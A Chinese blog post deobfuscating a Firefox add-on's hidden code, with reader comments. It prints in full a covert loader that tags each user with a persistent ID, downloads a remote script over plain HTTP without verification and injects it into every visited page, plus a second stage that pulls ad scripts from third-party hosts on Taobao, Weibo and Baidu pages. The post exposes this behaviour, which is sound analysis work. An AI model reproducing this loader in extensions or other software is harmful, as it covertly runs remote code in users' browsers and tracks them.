本文来自依云's Blog,转载请注明。
- 插件首页:http://imax.im/
- 插件地址:imaxim-0.0.3.xpi
- 插件功能:在豆瓣电影页面添加指向自己网站资源的链接
下载、解压,找到 app.js。最后有一段混淆过的代码,注释曰「划词搜索电影」。使用 NodeJS 把 eval 里的函数执行结果打出来,再扔到 Vim 里拿 jsbeautify.vim 格式化一下,结果如下:
/**
 * Deobfuscated loader from the extension's app.js (browser chrome context).
 *
 * What the visible code does:
 *  - keeps a random per-profile identifier in the preference
 *    "extensions.imax.uuid";
 *  - downloads a script from http://imax.taobaoimages.com/bootstrap.js,
 *    sending that identifier as the "cid" query parameter;
 *  - caches the response body in the preference "extensions.imax.code" and
 *    re-downloads it once the cached copy is older than 24 hours;
 *  - inserts the cached text as an inline <script> into documents that fire
 *    "load" inside the "appcontent" element.
 *
 * Review notes: the download uses plain HTTP and nothing here verifies the
 * response before it is stored and executed, so whatever the server (or
 * anyone able to alter the response in transit) returns ends up running
 * inside the pages the user visits. The preference names and the host above
 * are the observable artefacts of this loader.
 */
if (typeof(IMAXPluginChrome) == "undefined") {
    // Returns four hexadecimal digits derived from Math.random().
    function S4() {
        return (((1 + Math.random()) * 0x10000) | 0).toString(16).substring(1)
    }
    // Eight S4() chunks, i.e. a 32-hex-digit random string. It is used as a
    // persistent identifier (see getCid), not as a secret.
    function guid() {
        return (S4() + S4() + S4() + S4() + S4() + S4() + S4() + S4())
    }
    var IMAXPluginChrome = {
        // Returns the stored identifier, generating and saving one on first use.
        // Because it lives in a preference, the same value is sent on every
        // later bootstrap.js request from this profile.
        getCid: function() {
            var uuid = nsPreferences.copyUnicharPref("extensions.imax.uuid", "");
            if (typeof(uuid) == "undefined" || uuid == "") {
                uuid = guid();
                nsPreferences.setUnicharPref("extensions.imax.uuid", uuid)
            }
            return uuid
        },
        // Fetches bootstrap.js, stores the body and the fetch time in
        // preferences, then hands the body to `callback` for injection.
        loadScript: function(callback, unsafeWin) {
            var xhr = new XMLHttpRequest();
            xhr.onreadystatechange = function() {
                // Only a completed 200 response is accepted; the body itself is
                // not inspected or validated in any way.
                if (xhr.status == 200 && xhr.readyState == 4) {
                    var code = xhr.responseText;
                    nsPreferences.setUnicharPref("extensions.imax.code", code);
                    nsPreferences.setUnicharPref("extensions.imax.last_synced_at", Date.now() + "");
                    callback(unsafeWin, code)
                }
            };
            // Plain-HTTP request; the "FF_" prefix plus the stored identifier
            // is sent as the cid parameter.
            xhr.open("GET", "http://imax.taobaoimages.com/bootstrap.js?cid=FF_" + IMAXPluginChrome.getCid(), true);
            xhr.send(null)
        },
        // Event handler (registered for "load" in onLoad, despite its name):
        // injects the cached script into the document that fired the event,
        // refreshing the cache first when it is empty or stale.
        onDOMContentLoaded: function(event) {
            var code = nsPreferences.copyUnicharPref("extensions.imax.code", "");
            var last_synced_at = Number(nsPreferences.copyUnicharPref("extensions.imax.last_synced_at", 0));
            var unsafeWin = event.target.defaultView;
            // Prefer the unwrapped content window when the wrapper exposes one.
            if (unsafeWin.wrappedJSObject) {
                unsafeWin = unsafeWin.wrappedJSObject
            }
            // Appends the downloaded text to the page body as an inline script
            // element, so it executes as part of that page.
            function callback(unsafeWin, code) {
                var unsafeDocument = new XPCNativeWrapper(unsafeWin, "document").document;
                var script = unsafeDocument.createElement("script");
                script.type = "text/javascript";
                script.charset = "utf-8";
                script.textContent = code;
                unsafeDocument.body.appendChild(script)
            }
            // 1000 * 60 * 60 * 24 ms = 24 hours between re-downloads.
            if ((code == "") || ((Date.now() - last_synced_at) > (1000 * 60 * 60 * 24))) {
                IMAXPluginChrome.loadScript(callback, unsafeWin)
            } else {
                callback(unsafeWin, code)
            }
        },
        // Hooks "load" events (capturing) on the "appcontent" element —
        // presumably the browser's content area; confirm against the add-on's
        // overlay.
        onLoad: function(event) {
            var appcontent = document.getElementById("appcontent");
            if (appcontent) {
                appcontent.addEventListener("load", this.onDOMContentLoaded, true)
            }
        },
        // NOTE(review): the listeners removed here do not match what was
        // registered (init adds anonymous wrappers; onLoad adds a capturing
        // "load" listener, not "DOMContentLoaded"), so these calls look like
        // no-ops.
        onUnload: function(event) {
            window.removeEventListener("load", this.onLoad, false);
            window.removeEventListener("unload", this.onUnload, false);
            var appcontent = document.getElementById("appcontent");
            appcontent.removeEventListener("DOMContentLoaded", this.onDOMContentLoaded, false)
        },
        // Wires onLoad/onUnload to the chrome window's load and unload events.
        init: function() {
            window.addEventListener("load", function(event) {
                IMAXPluginChrome.onLoad(event)
            }, false);
            window.addEventListener("unload", function(event) {
                IMAXPluginChrome.onUnload(event)
            }, false)
        }
    };
    IMAXPluginChrome.init()
}
这段代码异步载入了来自 http://imax.taobaoimages.com/bootstrap.js?cid=FF_XXX 的代码,其中 XXX 是生成的用户 ID。载入的代码会缓存在首选项里(超过 24 小时重新获取),并以 script 元素的形式插入到浏览器打开的页面中执行;请求走的是明文 HTTP,也没有任何完整性校验。又是一段混淆过的代码,还是一样的 eval,转义字符串数组也一样扔 NodeJS 就行了。处理后的脚本如下:
/**
 * Deobfuscated bootstrap.js: the text the extension injects into pages as an
 * inline script. It consists of two independent immediately-invoked
 * functions, each of which adds a further remote <script> to the page when
 * the page URL matches a pattern. Both remote scripts are fetched over plain
 * HTTP from third-party hosts and run with the page's privileges.
 */

// Part 1: on matching URLs, load http://imax.taobaoimages.com/browser.js.
// The argument is the literal "CID" in this copy — presumably a placeholder
// for the per-user identifier; confirm against a live response.
(function(cid) {
    // window.tbk is a run-once marker on the page's window object.
    if (window.tbk) {
        return
    }
    window.tbk = true;
    // Key: regular-expression source; value: script URL to load on a match.
    // Inside a string literal "\." is just ".", so the dots match any
    // character, and the second alternative is not anchored to "http://".
    var plugin_scripts = {
        "http://(.*?\.tao)(bao\.com)|(tao\.et)(ao\.com)": "http://imax.taobaoimages.com/browser.js"
    };
    for (var enabledDomains in plugin_scripts) {
        // Despite the name, this is the full page URL, not just the host, so
        // the pattern can also match text in the path or query string.
        var host = document.location.href;
        if (host.match(RegExp(enabledDomains))) {
            // Assigned without var: becomes a global on the page's window.
            imax_script_url = plugin_scripts[enabledDomains];
            // Returns the value of the named cookie, or null when absent.
            function readCookie(name) {
                var nameEQ = name + "=";
                var ca = document.cookie.split(';');
                for (var i = 0; i < ca.length; i++) {
                    var c = ca[i];
                    while (c.charAt(0) == ' ') c = c.substring(1, c.length);
                    if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length)
                }
                return null
            }
            // Polls every 20 ms until the document has finished loading, then
            // appends the remote script to <head>.
            function addBrowserJs() {
                if (document.readyState == "complete") {
                    var h = document.getElementsByTagName('head')[0];
                    var s = document.createElement('script');
                    s.setAttribute('type', 'text/javascript');
                    s.setAttribute('charset', 'utf-8');
                    s.setAttribute('async', true);
                    // Both branches build the same URL in this copy, so the
                    // "_q_r_b_" cookie check has no effect here. The cid and
                    // a random cache-busting value go in the query string.
                    if (readCookie("_q_r_b_")) {
                        s.setAttribute('src', imax_script_url + '?v=plugin&cid=' + cid + "&_=" + Math.random())
                    } else {
                        s.setAttribute('src', imax_script_url + '?v=plugin&cid=' + cid + "&_=" + Math.random())
                    }
                    h.appendChild(s)
                } else {
                    window.setTimeout(addBrowserJs, 20)
                }
            }
            addBrowserJs()
        }
    }
})("CID");
// Part 2: on URLs matching one of three patterns, load
// http://taoad.wandoupai.com/ad.js?ad=<tag> as a script in the page body.
(function(d) {
    // Leftover string table from the obfuscator; nothing below references it.
    var _0xc429 = ['href', 'location', 'http://taoad.wandoupai.com/ad.js', '', 's.taobao.com/search', 'search', 'weibo', 'baidu', 'length', 'match', 'ad=', 'getElementsByClassName', 'createElement', 'className', 'body', 'getElementsByTagName', 'appendChild', 'script', 'T1xC6MXfthXXcWeqbX', '?', 'type', 'text/javascript', 'src'];
    var href = d.location.href;
    var host = 'http://taoad.wandoupai.com/ad.js';
    var url = '';
    // [pattern, tag] pairs. String.prototype.match turns each pattern string
    // into a regular expression tested against the whole URL, so 'weibo' and
    // 'baidu' match anywhere in it.
    var url_map = [['s.taobao.com/search', 'search'], ['weibo', 'weibo'], ['baidu', 'baidu']];
    for (var i = 0; i < url_map.length; i++) {
        if (href.match(url_map[i][0])) {
            url = 'ad=' + url_map[i][1];
            break;
        };
    };
    // No pattern matched: nothing is loaded on this page.
    if (url == '') {
        return false;
    };
    // Creates element `a` with class `b`, lets `c` configure it and appends
    // it to <body>. The class name doubles as an "already inserted" marker,
    // which also makes it a recognisable artefact in an affected page's DOM.
    var appendTag = function(a, b, c) {
        if (document.getElementsByClassName(b).length > 0) {
            return;
        };
        var el = d.createElement(a);
        el.className = b;
        c(el);
        var body0 = d.getElementsByTagName('body')[0];
        if (!body0) {
            return;
        };
        body0.appendChild(el);
        return el;
    };
    appendTag('script', 'T1xC6MXfthXXcWeqbX', function(a) {
        var link = host + '?' + url;
        a.type = 'text/javascript';
        a.src = link;
    });
})(document);
这段脚本会按照当前访问的网站地址载入地址类似 http://taoad.wandoupai.com/ad.js?ad=baidu 的脚本。目前,这个地址返回的是空文档。说好的广告呢……
Aug 21, 2013 10:59:54 AM
举报,
Aug 27, 2013 04:11:30 PM
啊 不知道chrome版有没有,我用这个插件了呢。
Sep 09, 2013 03:26:15 AM
显式广告的插件倒是下载过。直到在浏览网页时莫名加载了国外的 js,才发现是某插件在作怪
Oct 25, 2013 02:26:45 PM
我也遇到过插件里面有广告,但是我插件安装太多,不好定位是哪一个。
Feb 25, 2014 02:15:25 AM
虽说带有广告代码,但是能方便地提供下载链接还是不错。
Feb 25, 2014 02:06:01 PM
如果不这样藏掖着我也懒得理它。